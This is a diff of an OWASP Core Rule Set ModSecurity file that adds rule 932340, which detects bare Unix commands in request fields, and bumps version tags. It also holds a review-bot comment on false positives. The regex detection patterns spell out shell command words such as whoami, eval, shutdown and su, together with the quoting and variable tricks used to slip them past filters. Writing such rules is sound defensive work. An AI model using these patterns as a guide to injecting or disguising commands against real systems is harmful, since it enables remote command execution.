+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# [ Unix command injection ]
+#
+# This rule is meant to block the execution of commands with no arguments when it's possible to meaningfully do so.
+# False positive prone commands are not detected at PL-1.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+# .932340 (PL-1, matches commands with no arguments)
+# .932350 (PL-3, matches commands with no arguments)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932340.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932340 +# +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[
\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:aptitude|d(?:f|mesg)|env|h(?:ostname|top)|(?:(?:io|vm)sta|reboo)t|l(?:ast|s)|mysql(?:[^\s\x0b]{1,10}\b)?|ps(?:ql)?|s(?:et|hutdown|u)|w(?:ho(?:ami|is)?)?)$" \ + "id:932340,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution (No Arguments)',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/ATTACK-RCE',\ + tag:'capec/1000/152/248/88',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ 
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -603,7 +673,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !-\d"
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -644,7 +714,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFil
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -675,7 +745,7 @@ SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+\{" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -696,7 +766,7 @@ SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+\{" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -738,7 +808,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \ba[\"
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
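Review bot: Rule 932340 anchors on `(?:^|…)` at the left and `$` at the right without requiring any prefix, so an `ARGS_NAMES` or `ARGS` entry consisting of nothing but one of the listed words — including `w`, `ls`, `ps`, `su`, `df` and common parameter names such as `set`, `env` or `last`, in any case because of `(?i)` — now scores CRITICAL at PL1, whereas 932250 only matches a two- or three-character word when a delimiter follows it. Unless the false-positive corpus run showed otherwise, the one- and two-letter words belong in 932350 rather than here. The target list also adds `REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer`, which none of the PL1 siblings visible in this diff inspect and which the 'Rule relations' list attributes to 932237/932239; the rule header should record the rationale, e.g. `# Also inspects User-Agent and Referer because: <reason>`.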
@@ -776,7 +846,7 @@ SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEAD
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 chain"
 SecRule MATCHED_VARS "!@rx (?i)(?:\.boto|buddyinfo|mtrr|acpi|zoneinfo)\B" \
@@ -873,7 +943,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -910,14 +980,14 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -941,7 +1011,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -959,6 +1029,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?
 #
 # .932250 (base rule, PL1, targets two and three character commands)
 # .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+# .932340 (PL-1, matches commands with no arguments)
+# .932350 (PL-3, matches commands with no arguments)
 #
 # .932240 (generic detection, PL2, targets generic evasion attempts)
 # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
@@ -984,7 +1056,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(? # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932231 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\|
|&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \ +SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[
\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\x0b].*\b" \ "id:932231,\ phase:2,\ block,\ @@ -1000,7 +1072,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1033,7 +1105,7 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(. tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" 
@@ -1089,7 +1161,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ['\*\?
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.932200_matched_var_name=%{matched_var_name}',\
 chain"
@@ -1128,7 +1200,7 @@ SecRule REQUEST_HEADERS:Referer "@rx ^[^#]+" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
